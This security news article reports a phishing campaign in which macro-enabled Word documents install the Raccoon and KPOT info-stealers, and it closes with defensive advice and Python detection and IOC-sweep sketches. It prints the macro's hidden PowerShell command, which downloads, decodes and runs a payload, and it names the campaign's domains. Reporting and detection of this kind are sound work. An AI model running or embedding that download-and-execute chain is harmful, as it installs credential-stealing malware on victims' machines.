Friday, December 8, 2023

Hackers Attack Windows Users with Info-Stealer Malware via Weaponized MS Word Documents

Researchers from X-Force uncovered a malicious campaign that uses the info-stealers “Raccoon” and “KPOT” to target Windows users via fake emails and steal sensitive data.

The Raccoon malware is believed to originate from Russian-speaking hackers, and last year it actively attacked financial and government organizations with the Fallout and RIG exploit kits.

Types of Attempts to Infect Windows Users

This malware campaign delivers the payload via an email that contains a weaponized document which is signed using the DocuSign software. DocuSign is a company well known for enabling organizations to manage electronic documents.


The document subject is referred to as “files” or “paperwork” to tempt victims to open the file and execute the payload on the victim’s Windows machine.

Another sextortion fallout email sample collected by the researchers contains the following body content, with the senders calling themselves “the Red Skull hacker crew”:

“Private info belonging to your friend has been stolen”, “Your colleague’s account was compromised” or “We have got access to your friend’s account”.

Also, the attacker sends an intimate picture of his girlfriend and threatens to distribute the picture to the person's complete contact list if the victim does not pay the demanded ransom of 500 dollars.

A very recent sample uncovered by the researchers from IBM X-Force poses as an official “indictment message” sent by the court. This is supposed to frighten victims into believing that they are actually being sued in court for something they do not know of.

The body of the email urges the victims to examine and print out the documents, gives a deadline for a response, and explains the consequences if the victims fail to open the malicious document.


These are the main lures the attacker uses to tempt victims into opening the attachment and executing the malware payload.


Once the malicious document is opened, it keeps urging users to click “Enable content”, which executes the macro on the Windows machine.

All emails contain exactly the same macro content. As soon as the macros are run, a PowerShell command is executed in the background.

powershell -windowstyle hidden Import-Module BitsTransfer; Start-BitsTransfer -Source,, -Destination "$env:TEMP\","$env:TEMP\sfera","$env:TEMP\"; Set-Location -Path "$env:TEMP"; certutil -decode sfera tref;  Start-Process -ArgumentList tref

The above command will download the Raccoon info stealer hosted on corp6[.]site.
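The command above combines several behaviours that are individually common but rarely appear together: a hidden PowerShell window, a BITS download into the temp directory, certutil decoding and an immediate process start. The following detection sketch is an added example, not code from X-Force or the original article; the event field names, host names, Office parent list and scoring weights are assumptions, and the first sample command line is abridged from the one quoted above.

```python
import re

# Behaviours visible in the PowerShell command quoted in the article.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden\b", re.I),
    "bits_download": re.compile(r"\bStart-BitsTransfer\b", re.I),
    "temp_staging": re.compile(r"\$env:TEMP|\\AppData\\Local\\Temp\\", re.I),
    "certutil_decode": re.compile(r"\bcertutil(?:\.exe)?\s+[-/]decode\b", re.I),
    "start_process": re.compile(r"\bStart-Process\b", re.I),
}
# Office applications that should rarely spawn a shell (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def score_event(event):
    """Score one process-creation event; returns (score, matched names)."""
    hits = [n for n, rx in INDICATORS.items() if rx.search(event["command_line"])]
    score = len(hits)
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    if parent in OFFICE_PARENTS:  # a macro-launched shell adds extra weight
        hits.append("office_parent")
        score += 2
    return score, hits


def triage(events, threshold=4):
    """Return (host, score, hits) for events at or above the threshold."""
    scored = ((e["host"], *score_event(e)) for e in events)
    return [row for row in scored if row[1] >= threshold]


# Constructed sample events (hypothetical hosts; field names are assumptions).
SAMPLE_EVENTS = [
    {"host": "WS-017", "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "command_line": r'powershell -windowstyle hidden Import-Module BitsTransfer; '
                     r'Start-BitsTransfer -Source,, -Destination "$env:TEMP\sfera"; '
                     r'Set-Location -Path "$env:TEMP"; certutil -decode sfera tref; '
                     r'Start-Process -ArgumentList tref'},
    {"host": "ADM-002", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -NoProfile -Command "Start-BitsTransfer '
                     r'-Source https://updates.example.com/agent.msi '
                     r'-Destination C:\Installers\agent.msi"'},
    {"host": "PKI-001", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil.exe -decode C:\certs\ca.b64 C:\certs\ca.cer"},
]

if __name__ == "__main__":
    for host, score, hits in triage(SAMPLE_EVENTS):
        print(host, score, ", ".join(hits))
```

Only the macro-launched chain crosses the threshold; the administrator's BITS download and the standalone certutil decode each score 1 and stay below it.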

The recent campaign delivers KPOT and another info-stealer via new hardcoded URLs.

“It is worth mentioning that we have seen info stealing malware distributed comparably on the domains corp5[.]site, corp6[.]site and now corp7[.]site,” researchers said.


1. Do not click or open links in emails directly, instead type in the main URL in your browser or search the brand/company via your preferred search engine.

2. Ensure anti-virus software and associated files are up to date.

3. Search for existing signs of the indicated IOCs in your environment.

4. Block all URL and IP based IOCs at the firewall, IDS, web gateways, routers or other perimeter-based devices as a course of action to remediate this threat.

5. Keep applications and operating systems running at the current released patch level.
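For steps 3 and 4, the sketch below sweeps a DNS query log for the three domains named in this article and produces a refanged list for a gateway or DNS filter. It is an added example rather than tooling from the researchers; the log format, client addresses and the subdomain in the sample are constructed. Matching is aligned on DNS labels so that look-alike names do not produce false hits.

```python
# Domains named in the article, kept defanged as published there.
DEFANGED_IOCS = ["corp5[.]site", "corp6[.]site", "corp7[.]site"]


def refang(value):
    """Turn a defanged indicator back into a matchable lowercase hostname."""
    return value.replace("[.]", ".").lower().rstrip(".")


def host_matches(host, ioc_domains):
    """True if host is an IOC domain or a subdomain of one (label-aligned)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ioc_domains)


def sweep(log_lines, defanged_iocs=DEFANGED_IOCS):
    """Return (timestamp, client, queried_name) for every log line that hits."""
    iocs = {refang(i) for i in defanged_iocs}
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:  # skip malformed lines instead of crashing
            continue
        ts, client, name = fields[:3]
        if host_matches(name, iocs):
            hits.append((ts, client, name))
    return hits


def blocklist(defanged_iocs=DEFANGED_IOCS):
    """Refanged, de-duplicated, sorted domains for a gateway or DNS filter."""
    return sorted({refang(i) for i in defanged_iocs})


# Constructed DNS query log: "<timestamp> <client-ip> <queried-name> <type>".
SAMPLE_DNS_LOG = [
    "2023-12-08T09:14:02Z 10.0.4.17 corp6.site A",
    "2023-12-08T09:14:05Z 10.0.4.17 cdn.CORP7.site. A",
    "2023-12-08T09:15:40Z 10.0.9.3 notcorp6.site A",
    "2023-12-08T09:16:11Z 10.0.9.3 corp5.site.example.com A",
    "truncated-line",
]

if __name__ == "__main__":
    for ts, client, name in sweep(SAMPLE_DNS_LOG):
        print(ts, client, name)
    print("\n".join(blocklist()))
```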




BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
